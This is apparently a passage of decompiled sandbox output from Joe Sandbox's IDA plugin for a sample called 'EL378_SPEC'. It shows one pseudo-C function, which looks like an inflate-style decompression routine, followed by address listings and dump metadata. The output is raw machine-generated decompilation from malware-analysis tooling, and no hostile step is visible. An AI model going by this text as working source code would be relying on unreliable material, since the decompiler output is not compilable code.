																							__eflags = _t490 - 0x118;
																							_pop(_t587);
																							_t583 =  <  ? _t569 : _t587;
																							__eflags = _t583;
																						} else {
																							_push(9);
																							_pop(_t583);
																						}
																					}
																					L19:
																					 *(0x433520 + _t490 * 4) = _t583;
																					_t490 = _t490 + 1;
																					__eflags = _t490 - 0x120;
																				} while (_t490 < 0x120);
																				_t567 =  *(_t657 + 0x38);
																				E00406EA8(0x433520, 0x120, 0x101, 0x4099c4, 0x409a04, 0x433098, 0x40b0e4, 0x432818, _t657 + 0x28);
																				_push(0x1e);
																				_pop(_t585);
																				_push(5);
																				_pop(_t493);
																				memset(0x433520, _t493, _t585 << 2);
																				_t657 = _t657 + 0xc;
																				E00406EA8(0x433520, 0x1e, 0, 0x409a44, 0x409a80, 0x43309c, 0x40b0e8, 0x432818, _t657 + 0x28);
																				_t647 =  *(_t657 + 0x2c);
																				 *0x432810 = 1;
																				goto L21;
																			}
																		}
																		L9:
																		_t497 = _t485 - 1;
																		__eflags = _t497;
																		if(_t497 == 0) {
																			 *_t567 = 0xb;
																			goto L177;
																		}
																		L10:
																		__eflags = _t497 == 1;
																		_t476 =  *(_t657 + 0x10);
																		if(_t497 == 1) {
																			goto L194;
																		} else {
																			goto L178;
																		}
																	} else {
																		_t588 =  *(_t657 + 0x14);
																		while(1) {
																			L4:
																			__eflags = _t476;
																			if(_t476 == 0) {
																				goto L181;
																			}
																			L5:
																			 *(_t657 + 0x10) = _t476 - 1;
																			_t503 = ( *_t588 & 0x000000ff) << _t652;
																			_t652 = _t652 + 8;
																			_t647 = _t647 | _t503;
																			_push(3);
																			_pop(_t504);
																			_t588 =  &(( *(_t657 + 0x14))[1]);
																			__eflags = _t652 - _t504;
																			_t476 =  *(_t657 + 0x10);
																			 *(_t657 + 0x14) = _t588;
																			if(_t652 < _t504) {
																				continue;
																			} else {
																				goto L7;
																			}
																		}
																		goto L181;
																	}
																case 9:
																	L24:
																	__edx =  *(__esp + 0x48);
																	__eflags = __esi - 0x20;
																	if(__esi >= 0x20) {
																		L29:
																		__eax = __di & 0x0000ffff;
																		__esi = 0;
																		__edi = 0;
																		__ebx[1] = __eax;
																		 *(__esp + 0x20) = 0;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = __ebx[0x145];
																		} else {
																			_push(0xa);
																			_pop(__eax);
																		}
																		 *__ebx = __eax;
																		goto L177;
																	}
																	L25:
																	__ecx =  *(__esp + 0x14);
																	while(1) {
																		L26:
																		__eflags = __eax;
																		if(__eax == 0) {
																			break;
																		}
																		L27:
																		 *(__esp + 0x10) = __eax;
																		__eax =  *__ecx & 0x000000ff;
																		__ecx = __esi;
																		__eax = __eax << __cl;
																		__esi = __esi + 8;
																		__ecx =  *(__esp + 0x14);
																		__edi = __edi | __eax;
																		__eax =  *(__esp + 0x10);
																		__ecx =  *(__esp + 0x14) + 1;
																		 *(__esp + 0x14) = __ecx;
																		__eflags = __esi - 0x20;
																		if(__esi < 0x20) {
																			continue;
																		}
																		L28:
																		__ecx =  *(__esp + 0x18);
																		goto L29;
																	}
																	L181:
																	_t567[0x147] = _t647;
																	_t567[0x146] = _t652;
																	_t393 =  &(_t641[1]);
																	 *_t393 = _t641[1] & 0x00000000;
																	__eflags =  *_t393;
																	 *_t641 = _t588;
																	_t567[0x26ea] =  *(_t657 + 0x18);
																	goto L182;
																case 0xa:
																	L33:
																	__edx =  *(__esp + 0x48);
																	__eflags = __eax;
																	if(__eax == 0) {
																		L185:
																		__eax =  *(__esp + 0x14);
																		__ebx[0x147] = __edi;
																		__ebx[0x146] = __esi;
																		 *(__edx + 4) =  *(__edx + 4) & 0x00000000;
																		 *__edx =  *(__esp + 0x14);
																		__ebx[0x26ea] = __ecx;
																		L182:
																		_push(_t641);
																		L183:
																		L00407FBE();
																		_t450 = 0;
																		goto L197;
																	}
																	L34:
																	__eflags = __ebp;
																	if(__ebp != 0) {
																		L51:
																		__edx =  *(__esp + 0x14);
																		__eflags = __ebp - __eax;
																		__esi = __eax;
																		__esi =  <  ? __ebp : __eax;
																		__eflags = __ebx[1] - __esi;
																		__esi =  <  ? __ebx[1] : __esi;
																		E004066B4(__ecx,  *(__esp + 0x14), __esi) =  *(__esp + 0x10);
																		__ebp = __ebp - __esi;
																		__ecx =  *(__esp + 0x18);
																		__eax =  *(__esp + 0x10) - __esi;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + __esi;
																		__ecx =  *(__esp + 0x18) + __esi;
																		_t72 =  &(__ebx[1]);
																		 *_t72 = __ebx[1] - __esi;
																		__eflags =  *_t72;
																		__esi =  *(__esp + 0x20);
																		_push(0xf);
																		 *(__esp + 0x14) = __eax;
																		 *(__esp + 0x1c) = __ecx;
																		_pop(__edx);
																		if( *_t72 != 0) {
																			goto L179;
																		}
																		L52:
																		__eax = __ebx[0x145];
																		 *__ebx = __eax;
																		L53:
																		_t476 =  *(_t657 + 0x10);
																		goto L179;
																	}
																	L35:
																	__eflags = __ecx - __ebx[0x26e8];
																	if(__ecx != __ebx[0x26e8]) {
																		L41:
																		__ebx[0x26ea] = __ecx;
																		L00407FBE(__edx);
																		__ecx = __ebx[0x26ea];
																		__edx = __ebx[0x26e9];
																		__eax = __ebx[0x26e8];
																		 *(__esp + 0x18) = __ecx;
																		__eflags = __ecx - __edx;
																		if(__ecx >= __edx) {
																			__ebp = __eax;
																			__ebp = __eax - __ecx;
																			__eflags = __ebp;
																		} else {
																			__edx = __edx - __ecx;
																			__ebp = __edx - __ecx - 1;
																		}
																		__eflags = __ecx - __eax;
																		if(__ecx == __eax) {
																			__eax =  &(__ebx[0x6e8]);
																			__eflags = __edx - __eax;
																			if(__eflags != 0) {
																				__ecx = __eax;
																				 *(__esp + 0x18) = __ecx;
																				if(__eflags <= 0) {
																					__ebp = __ebx[0x26e8];
																					__ebp = __ebx[0x26e8] - __eax;
																					__eflags = __ebp;
																				} else {
																					__ebp = __edx - __eax - 1;
																				}
																			}
																		}
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			L184:
																			__eax =  *(__esp + 0x48);
																			__edx =  *(__esp + 0x14);
																			__ebx[0x146] = __esi;
																			__esi =  *(__esp + 0x10);
																			__ebx[0x147] = __edi;
																			 *(__eax + 4) =  *(__esp + 0x10);
																			 *__eax =  *(__esp + 0x14);
																			__ebx[0x26ea] = __ecx;
																			_push(__eax);
																			goto L183;
																		} else {
																			L50:
																			__eax =  *(__esp + 0x10);
																			goto L51;
																		}
																	}
																	L36:
																	__ebp =  &(__ebx[0x6e8]);
																	 *(__esp + 0x24) =  &(__ebx[0x6e8]);
																	__ebp = __ebx[0x26e9];
																	__eflags = __ebp -  *(__esp + 0x24);
																	if(__eflags == 0) {
																		goto L41;
																	}
																	L37:
																	__ecx =  &(__ebx[0x6e8]);
																	 *(__esp + 0x18) = __ecx;
																	if(__eflags <= 0) {
																		__ebp = __ebx[0x26e8];
																		__ebp = __ebx[0x26e8] -  *(__esp + 0x24);
																		__eflags = __ebp;
																	} else {
																		__ebp = __ebp -  *(__esp + 0x24);
																		__ebp = __ebp - 1;
																	}
																	__eflags = __ebp;
																	if(__ebp != 0) {
																		goto L51;
																	} else {
																		goto L41;
																	}
																case 0xb:
																	goto L0;
																case 0xc:
																	L60:
																	_t574 = _t567[2];
																	_t637 =  *(_t657 + 0x48);
																	goto L65;
																case 0xd:
																	goto L71;
																case 0xe:
																	goto L194;
																case 0xf:
																	L174:
																	__edx =  *(__esp + 0x48);
																	__ebx[0x26ea] = __ecx;
																	L00407FBE( *(__esp + 0x48));
																	__ecx = __ebx[0x26ea];
																	__eax = __ebx[0x26e9];
																	 *(__esp + 0x18) = __ecx;
																	__eflags = __ecx - __eax;
																	if(__ecx < __eax) {
																		L191:
																		__edx =  *(__esp + 0x48);
																		L192:
																		 *(__esp + 0x1c) =  *(__esp + 0x1c) & 0x00000000;
																		__ebx[0x146] = __esi;
																		__esi =  *(__esp + 0x10);
																		__ebx[0x147] = __edi;
																		 *(__edx + 4) =  *(__esp + 0x10);
																		goto L196;
																	}
																	L175:
																	__ebp = __ebx[0x26e8];
																	__ebp = __ebx[0x26e8] - __ecx;
																	__eflags = __ecx - __eax;
																	if(__ecx != __eax) {
																		goto L191;
																	}
																	L176:
																	__eax = __ebx[0x145];
																	 *__ebx = __eax;
																	__eflags = __eax - 8;
																	if(__eax != 8) {
																		L190:
																		__edx =  *(__esp + 0x48);
																		__ebx[0x146] = __esi;
																		__esi =  *(__esp + 0x10);
																		__ebx[0x147] = __edi;
																		 *( *(__esp + 0x48) + 4) =  *(__esp + 0x10);
																		 *(__esp + 0x1c) = 1;
																		goto L196;
																	}
																	goto L177;
															}
														}
														goto L194;
													}
													L110:
													_t567[3] = _t532;
													_t567[2] = _t609 + (_t609[2] & 0x0000ffff) * 4;
													goto L22;
												}
												L108:
												_t639 = 0xf;
												_t567[2] = _t532 & _t639;
												_t567[1] = _t609[2] & 0x0000ffff;
												 *_t567 = 2;
												goto L53;
											}
											L106:
											_t567[2] = _t609[2] & 0x0000ffff;
											 *_t567 = 6;
											goto L22;
										} else {
											goto L187;
										}
									}
									L72:
									while(1) {
										L76:
										_t611 = _t567[0x143];
										if(_t652 < _t611) {
											break;
										}
										L77:
										_t544 = _t567[0x144];
										_t614 =  *(0x40b0c0 + _t611 * 2) & 0x0000ffff & _t647;
										_t545 =  *(_t544 + 2 + _t614 * 4) & 0x0000ffff;
										 *(_t657 + 0x24) =  *(_t544 + 1 + _t614 * 4) & 0x000000ff;
										_t637 =  *(_t657 + 0x48);
										 *(_t657 + 0x2c) = _t545;
										if(_t545 >= 0x10) {
											L79:
											if(_t545 != 0x12) {
												_t615 = _t545 - 0xe;
											} else {
												_t615 = 7;
											}
											 *(_t657 + 0x20) = _t615;
											_t616 = 0xb;
											_t546 = 3;
											_t617 =  !=  ? _t546 : _t616;
											_t547 =  *(_t657 + 0x20);
											 *(_t657 + 0x28) =  !=  ? _t546 : _t616;
											_t619 =  *(_t657 + 0x24) + _t547;
											 *(_t657 + 0x30) = _t619;
											if(_t652 >= _t619) {
												L86:
												_t651 = _t647 >>  *(_t657 + 0x24);
												 *(_t657 + 0x28) = ( *(0x40b0c0 + _t547 * 2) & 0x0000ffff & _t651) +  *(_t657 + 0x28);
												_t652 = _t652 - _t547 +  *(_t657 + 0x24);
												_t647 = _t651 >> _t547;
												_t625 = _t567[1];
												 *(_t657 + 0x20) = _t567[2];
												_t476 =  *(_t657 + 0x20) +  *(_t657 + 0x28);
												if(_t476 > (_t625 & 0x0000001f) + (_t625 >> 0x00000005 & 0x0000001f) + 0x102) {
													goto L188;
												}
												L87:
												_t476 =  *(_t657 + 0x20);
												if( *(_t657 + 0x2c) != 0x10) {
													L90:
													_t186 = _t657 + 0x2c;
													 *_t186 =  *(_t657 + 0x2c) & 0x00000000;
													L91:
													_t646 =  *(_t657 + 0x2c);
													_t629 =  &(_t567[_t476 + 3]);
													do {
														L92:
														_t476 = _t476 + 1;
														 *_t629 = _t646;
														_t192 = _t657 + 0x28;
														 *_t192 =  *(_t657 + 0x28) - 1;
														_t629 =  &(_t629[1]);
													} while ( *_t192 != 0);
													_t637 =  *(_t657 + 0x48);
													_t567[2] = _t476;
													L94:
													 *(_t657 + 0x20) = _t476;
													_t555 = _t567[1];
													 *(_t657 + 0x24) = _t555;
													if( *(_t657 + 0x20) < (_t555 & 0x0000001f) + 0x102 + (_t555 >> 0x00000005 & 0x0000001f)) {
														continue;
													}
													goto L95;
												}
												L88:
												if(_t476 < 1) {
													goto L188;
												}
												L89:
												 *(_t657 + 0x2c) =  *(_t567 + 8 + _t476 * 4);
												goto L91;
											} else {
												while(1) {
													L83:
													_t559 =  *(_t657 + 0x10);
													if(_t559 == 0) {
														goto L189;
													}
													L84:
													_t634 = _t652;
													 *(_t657 + 0x10) = _t559 - 1;
													_t652 = _t652 + 8;
													_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t634;
													 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
													if(_t652 <  *(_t657 + 0x30)) {
														continue;
													}
													L85:
													_t547 =  *(_t657 + 0x20);
													goto L86;
												}
												goto L189;
											}
										}
										L78:
										_t635 =  *(_t657 + 0x24);
										_t652 = _t652 - _t635;
										_t647 = _t647 >> _t635;
										 *(_t567 + 0xc + _t567[2] * 4) =  *(_t657 + 0x2c);
										_t567[2] = _t567[2] + 1;
										_t476 = _t567[2];
										goto L94;
									}
									L74:
									_t539 =  *(_t657 + 0x10);
									if(_t539 == 0) {
										goto L189;
									}
									L75:
									 *(_t657 + 0x10) = _t539 - 1;
									_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
									 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
									_t652 = _t652 + 8;
									goto L76;
								}
							} else {
								goto L67;
							}
							do {
								L67:
								_t105 = _t567[2] + 0x4099b0; // 0x121110
								 *(_t567 + 0xc +  *_t105 * 4) =  *(_t567 + 0xc +  *_t105 * 4) & 0x00000000;
								_t567[2] = _t567[2] + 1;
							} while (_t567[2] < _t638);
							goto L68;
						}
					}
				}
			}

0x004075fe
0x004075fe
0x004075fe
0x004075fe
0x004075fe
0x004075fe
0x004075fe
0x00000000
0x00407629
0x00407606
0x00407ee0
0x00407ee0
0x00407ee5
0x00407eeb
0x00407ef1
0x00407f5a
0x00407f5e
0x00407f65
0x00407f6b
0x00407f70
0x00407f74
0x00407f7b
0x00407f7b
0x0040760c
0x0040760f
0x0040761c
0x0040761e
0x00407622
0x00407626
0x00407626
0x00407630
0x00407638
0x00407640
0x00407ea3
0x00407ea3
0x00407ead
0x00407eb3
0x00407eb9
0x00000000
0x00407658
0x00407658
0x00407658
0x0040765b
0x0040765e
0x00407662
0x00407666
0x0040766c
0x0040766c
0x0040766c
0x0040766f
0x00000000
0x004076c9
0x0040769a
0x0040769a
0x0040769c
0x0040769f
0x00000000
0x00000000
0x00407675
0x00407675
0x0040767b
0x00000000
0x00000000
0x00407681
0x00407684
0x00407691
0x00407693
0x00407697
0x00407697
0x004076a1
0x004076a3
0x004076a4
0x004076a6
0x004076ab
0x004076b0
0x004076b7
0x004076be
0x004076bf
0x004076c0
0x004076c2
0x004076c5
0x004076c5
0x004076d8
0x004076db
0x004076f4
0x004076f6
0x004076f7
0x00407702
0x00407722
0x00407729
0x00407764
0x00407764
0x00000000
0x00407733
0x00407733
0x00407733
0x00407736
0x0040773c
0x0040773c
0x00407741
0x00407745
0x0040775c
0x004078fc
0x004078fc
0x00407904
0x0040790d
0x00407920
0x00407926
0x0040792e
0x0040793d
0x0040795f
0x0040796b
0x0040796c
0x00407971
0x00407ec1
0x00407ec1
0x00407ec5
0x00407ec5
0x00407ecf
0x00407ed5
0x00407edb
0x00407f53
0x00407f56
0x00000000
0x00407f56
0x00407977
0x004079a9
0x004079b0
0x00000000
0x00000000
0x004079b6
0x004079b6
0x004079bc
0x004079cc
0x004079d0
0x004079d3
0x004079da
0x004079e1
0x004079e4
0x004079e7
0x004079eb
0x004079f1
0x004079f4
0x004079f8
0x004079fe
0x004079fe
0x00407a29
0x00407a29
0x00407a29
0x00407a2e
0x00000000
0x00000000
0x00407a04
0x00407a06
0x00000000
0x00000000
0x00407a0c
0x00407a0f
0x00407a1c
0x00407a1e
0x00407a22
0x00407a26
0x00407a26
0x00407a30
0x00407a38
0x00407a3b
0x00407a3d
0x00407a40
0x00407a45
0x00407a47
0x00407a49
0x00407a4b
0x00407a4f
0x00407a53
0x00407a58
0x00407a6c
0x00407a6e
0x00407a8e
0x00407a90
0x00407aa4
0x00407aa6
0x00407f36
0x00407f36
0x00407f3a
0x00407f3a
0x00407f3e
0x00407f44
0x00407f4a
0x00407f50
0x00000000
0x00407f50
0x00407aac
0x00407aae
0x00407aaf
0x00407473
0x00407e22
0x00407e22
0x00407e26
0x00407e28
0x00000000
0x00407e29
0x004072f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab6
0x00407ab6
0x00407ae1
0x00407ae1
0x00407ae1
0x00407ae4
0x00407ae6
0x00000000
0x00000000
0x00407abc
0x00407abc
0x00407abe
0x00000000
0x00000000
0x00407ac4
0x00407ac4
0x00407ac5
0x00407ac7
0x00407acf
0x00407ad2
0x00407ad4
0x00407ad6
0x00407ada
0x00407ade
0x00407ade
0x00407ade
0x00407ae8
0x00407ae8
0x00407af0
0x00407af2
0x00407af4
0x00407af7
0x00407af7
0x00407af9
0x00407afd
0x00407b00
0x00407b03
0x00407b06
0x00407b08
0x00407b09
0x00407b0b
0x00000000
0x00000000
0x00407b0f
0x00407b0f
0x00407b3a
0x00407b3a
0x00407b3a
0x00407b3d
0x00407b3f
0x00000000
0x00000000
0x00407b15
0x00407b15
0x00407b17
0x00000000
0x00000000
0x00407b1d
0x00407b1d
0x00407b1e
0x00407b20
0x00407b28
0x00407b2b
0x00407b2d
0x00407b2f
0x00407b33
0x00407b37
0x00407b37
0x00407b37
0x00407b41
0x00407b41
0x00407b49
0x00407b4e
0x00407b51
0x00407b55
0x00407b59
0x00407b5b
0x00407b5e
0x00407b60
0x00407b64
0x00407b66
0x00407b86
0x00407b86
0x00407b88
0x00000000
0x00000000
0x00407b8e
0x00407b8e
0x00000000
0x00407b8e
0x00407b68
0x00407b68
0x00407b6a
0x00407b6b
0x00407b6d
0x00407b71
0x00407b74
0x00407b78
0x00407b7b
0x00000000
0x00000000
0x00407b97
0x00407b97
0x00407bc2
0x00407bc2
0x00407bc2
0x00407bc5
0x00407bc7
0x00000000
0x00000000
0x00407b9d
0x00407b9d
0x00407b9f
0x00000000
0x00000000
0x00407ba5
0x00407ba5
0x00407ba6
0x00407ba8
0x00407bb0
0x00407bb3
0x00407bb5
0x00407bb7
0x00407bbb
0x00407bbf
0x00407bbf
0x00407bbf
0x00407bc9
0x00407bc9
0x00407bd1
0x00407bd3
0x00407bd5
0x00407bd8
0x00407bd8
0x00407bda
0x00407bde
0x00407be2
0x00000000
0x00000000
0x00407be8
0x00407be8
0x00407bee
0x00407bf0
0x00407bf5
0x00407bf8
0x00407c0e
0x00407c10
0x00407c10
0x00407bfa
0x00407c00
0x00407c05
0x00407c0a
0x00407c0a
0x00407c13
0x00407c17
0x00407c1b
0x00407c21
0x00407c21
0x00407c21
0x00407c23
0x00000000
0x00000000
0x00407c29
0x00407c29
0x00407c2f
0x00407c56
0x00407c57
0x00407c5d
0x00407c62
0x00407c68
0x00407c6e
0x00407c72
0x00407c76
0x00407c78
0x00407c87
0x00407c8d
0x00407c8f
0x00407c8f
0x00407c7a
0x00407c7a
0x00407c7c
0x00407c82
0x00407c84
0x00407c84
0x00407c91
0x00407c95
0x00407c97
0x00407c99
0x00407c9f
0x00407ca5
0x00407ca7
0x00407cad
0x00407caf
0x00407cb3
0x00407cb5
0x00407cbc
0x00407cc0
0x00407cc0
0x00407cb7
0x00407cb7
0x00407cb9
0x00407cb9
0x00407cb5
0x00407ca5
0x00407cc2
0x00407cc4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407cc4
0x00407c31
0x00407c31
0x00407c37
0x00407c3d
0x00407c3f
0x00000000
0x00000000
0x00407c41
0x00407c41
0x00407c43
0x00407c4a
0x00407c50
0x00407c50
0x00407c45
0x00407c45
0x00407c47
0x00407c47
0x00407c52
0x00407c54
0x00000000
0x00000000
0x00407cca
0x00407cca
0x00407cce
0x00407cd0
0x00407cd2
0x00407cd3
0x00407cd7
0x00407cd8
0x00407cdc
0x00407cdd
0x00407ce1
0x00407ce7
0x00407ce9
0x00407cef
0x00407cef
0x00407cf3
0x00407cf3
0x00407cf3
0x00407cf3
0x00407c21
0x00000000
0x00000000
0x00407d05
0x00407d05
0x00407d09
0x00407d0b
0x00407db2
0x00407db2
0x00407db5
0x00407db7
0x00407db8
0x00407dbc
0x00407cfd
0x00407cfd
0x00000000
0x00407cfd
0x00407d11
0x00407d11
0x00407d17
0x00407d3e
0x00407d3f
0x00407d45
0x00407d4a
0x00407d50
0x00407d56
0x00407d5a
0x00407d5e
0x00407d60
0x00407d6f
0x00407d75
0x00407d77
0x00407d77
0x00407d62
0x00407d62
0x00407d64
0x00407d6a
0x00407d6c
0x00407d6c
0x00407d79
0x00407d7d
0x00407d7f
0x00407d81
0x00407d87
0x00407d8d
0x00407d8f
0x00407d95
0x00407d97
0x00407d9b
0x00407d9d
0x00407da4
0x00407da8
0x00407da8
0x00407d9f
0x00407d9f
0x00407da1
0x00407da1
0x00407d9d
0x00407d8d
0x00407daa
0x00407dac
0x00000000
0x00000000
0x00000000
0x00000000
0x00407dac
0x00407d19
0x00407d19
0x00407d1f
0x00407d25
0x00407d27
0x00000000
0x00000000
0x00407d29
0x00407d29
0x00407d2b
0x00407d32
0x00407d38
0x00407d38
0x00407d2d
0x00407d2d
0x00407d2f
0x00407d2f
0x00407d3a
0x00407d3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407dc2
0x00407dc2
0x00407dc4
0x00407dc5
0x00407dc7
0x00407dc9
0x00407dcc
0x00407dcd
0x00407dcd
0x00407dcd
0x00407dd1
0x00407dd5
0x00407dd5
0x00000000
0x00000000
0x004072f8
0x004072f8
0x004072fc
0x004072ff
0x00407336
0x00407338
0x0040733b
0x0040733e
0x00407341
0x00407345
0x00407347
0x00407349
0x0040734a
0x0040734f
0x0040735b
0x0040735f
0x00407363
0x00407363
0x00407366
0x0040747c
0x0040747c
0x00407480
0x00407486
0x00407489
0x0040748b
0x0040748e
0x00000000
0x0040748e
0x0040736c
0x0040736c
0x0040736c
0x0040736f
0x00407393
0x00407393
0x0040739a
0x00407450
0x00407450
0x00407455
0x00407458
0x0040745d
0x00407460
0x00407465
0x00407468
0x0040746d
0x0040746d
0x00407470
0x00000000
0x004073a0
0x004073a0
0x004073a5
0x004073a5
0x004073a7
0x004073a9
0x004073aa
0x004073aa
0x004073aa
0x004073ac
0x004073ad
0x004073b2
0x004073b4
0x004073b9
0x004073c0
0x004073c2
0x004073c7
0x004073c8
0x004073c8
0x004073bb
0x004073bb
0x004073bd
0x004073bd
0x004073b9
0x004073cb
0x004073cb
0x004073d2
0x004073d8
0x004073d8
0x004073dc
0x00407409
0x0040740e
0x00407410
0x00407411
0x00407413
0x0040741b
0x0040741b
0x00407440
0x00407445
0x00407449
0x00000000
0x00407449
0x0040739a
0x00407371
0x00407371
0x00407371
0x00407374
0x00407388
0x00000000
0x00407388
0x00407376
0x00407376
0x00407379
0x0040737d
0x00000000
0x00407383
0x00000000
0x00407383
0x00407301
0x00407301
0x00407305
0x00407305
0x00407305
0x00407307
0x00000000
0x00000000
0x0040730d
0x0040730e
0x00407317
0x00407319
0x00407320
0x00407322
0x00407324
0x00407325
0x00407326
0x00407328
0x0040732c
0x00407330
0x00000000
0x00407332
0x00000000
0x00407332
0x00407330
0x00000000
0x00407305
0x00000000
0x00407494
0x00407494
0x00407498
0x0040749b
0x004074d0
0x004074d0
0x004074d3
0x004074d5
0x004074d7
0x004074da
0x004074de
0x004074e0
0x004074e7
0x004074e2
0x004074e2
0x004074e4
0x004074e4
0x004074ed
0x00000000
0x004074ed
0x0040749d
0x0040749d
0x004074a1
0x004074a1
0x004074a1
0x004074a3
0x00000000
0x00000000
0x004074a9
0x004074aa
0x004074ae
0x004074b1
0x004074b3
0x004074b5
0x004074b8
0x004074bc
0x004074be
0x004074c2
0x004074c3
0x004074c7
0x004074ca
0x00000000
0x00000000
0x004074cc
0x004074cc
0x00000000
0x004074cc
0x00407e36
0x00407e3a
0x00407e40
0x00407e46
0x00407e46
0x00407e46
0x00407e4a
0x00407e4c
0x00000000
0x00000000
0x004074f4
0x004074f4
0x004074f8
0x004074fa
0x00407e85
0x00407e85
0x00407e89
0x00407e8f
0x00407e95
0x00407e99
0x00407e9b
0x00407e52
0x00407e52
0x00407e53
0x00407e53
0x00407e58
0x00000000
0x00407e58
0x00407500
0x00407500
0x00407502
0x004075a9
0x004075a9
0x004075ad
0x004075af
0x004075b1
0x004075b4
0x004075b7
0x004075c3
0x004075c7
0x004075c9
0x004075cd
0x004075cf
0x004075d3
0x004075d5
0x004075d5
0x004075d5
0x004075d8
0x004075dc
0x004075de
0x004075e2
0x004075e6
0x004075e7
0x00000000
0x00000000
0x004075ed
0x004075ed
0x004075f3
0x004075f5
0x004075f5
0x00000000
0x004075f5
0x00407508
0x00407508
0x0040750e
0x00407547
0x00407548
0x0040754e
0x00407553
0x00407559
0x0040755f
0x00407565
0x00407569
0x0040756b
0x00407574
0x00407576
0x00407576
0x0040756d
0x0040756f
0x00407571
0x00407571
0x00407578
0x0040757a
0x0040757c
0x00407582
0x00407584
0x00407586
0x00407588
0x0040758c
0x00407595
0x0040759b
0x0040759b
0x0040758e
0x00407592
0x00407592
0x0040758c
0x00407584
0x0040759d
0x0040759f
0x00407e5f
0x00407e5f
0x00407e63
0x00407e67
0x00407e6d
0x00407e71
0x00407e77
0x00407e7a
0x00407e7c
0x00407e82
0x00000000
0x004075a5
0x004075a5
0x004075a5
0x00000000
0x004075a5
0x0040759f
0x00407510
0x00407510
0x00407516
0x0040751a
0x00407520
0x00407524
0x00000000
0x00000000
0x00407526
0x00407526
0x0040752c
0x00407530
0x00407539
0x0040753f
0x0040753f
0x00407532
0x00407532
0x00407536
0x00407536
0x00407543
0x00407545
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040766c
0x0040766c
0x0040766f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407dd9
0x00407dd9
0x00407dde
0x00407de4
0x00407de9
0x00407def
0x00407df5
0x00407df9
0x00407dfb
0x00407f18
0x00407f18
0x00407f1c
0x00407f1c
0x00407f21
0x00407f27
0x00407f2b
0x00407f31
0x00000000
0x00407f31
0x00407e01
0x00407e01
0x00407e07
0x00407e09
0x00407e0b
0x00000000
0x00000000
0x00407e11
0x00407e11
0x00407e17
0x00407e19
0x00407e1c
0x00407ef7
0x00407ef7
0x00407efb
0x00407f01
0x00407f05
0x00407f0b
0x00407f0e
0x00000000
0x00407f0e
0x00000000
0x00000000
0x004072f1
0x00000000
0x00407e31
0x00407a92
0x00407a92
0x00407a9c
0x00000000
0x00407a9c
0x00407a70
0x00407a72
0x00407a75
0x00407a80
0x00407a83
0x00000000
0x00407a83
0x00407a5a
0x00407a5e
0x00407a61
0x00000000
0x00000000
0x00000000
0x00000000
0x004079bc
0x00407762
0x00407794
0x00407794
0x00407794
0x0040779c
0x00000000
0x00000000
0x0040779e
0x004077a6
0x004077ac
0x004077b3
0x004077b8
0x004077bc
0x004077c0
0x004077c7
0x004077e7
0x004077ea
0x004077f1
0x004077ec
0x004077ee
0x004077ee
0x004077f4
0x004077fa
0x004077fd
0x004077fe
0x00407801
0x00407805
0x0040780d
0x0040780f
0x00407815
0x00407846
0x0040784a
0x0040785a
0x00407864
0x00407866
0x0040786b
0x0040786e
0x00407888
0x0040788e
0x00000000
0x00000000
0x00407894
0x00407899
0x0040789d
0x004078b2
0x004078b2
0x004078b2
0x004078b7
0x004078b7
0x004078be
0x004078c1
0x004078c1
0x004078c1
0x004078c2
0x004078c4
0x004078c4
0x004078c9
0x004078c9
0x004078ce
0x004078d2
0x004078d5
0x004078d5
0x004078d9
0x004078de
0x004078f6
0x00000000
0x00000000
0x00000000
0x004078f6
0x0040789f
0x004078a2
0x00000000
0x00000000
0x004078a8
0x004078ac
0x00000000
0x00407817
0x00407817
0x00407817
0x00407817
0x0040781d
0x00000000
0x00000000
0x00407823
0x00407824
0x00407826
0x0040782a
0x00407836
0x00407838
0x00407840
0x00000000
0x00000000
0x00407842
0x00407842
0x00000000
0x00407842
0x00000000
0x00407817
0x00407815
0x004077c9
0x004077cc
0x004077d0
0x004077d2
0x004077d8
0x004077dc
0x004077df
0x00000000
0x004077df
0x0040776f
0x0040776f
0x00407775
0x00000000
0x00000000
0x0040777b
0x0040777e
0x0040778b
0x0040778d
0x00407791
0x00000000
0x00407791
0x00000000
0x00000000
0x00000000
0x004076dd
0x004076dd
0x004076e0
0x004076e7
0x004076ec
0x004076ef
0x00000000
0x004076dd
0x0040766c
0x00407640

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
Instruction ID: 34855fb2682deb8042092b43f828aa3e625fb4f43d1e7d882369f70b8a17060e
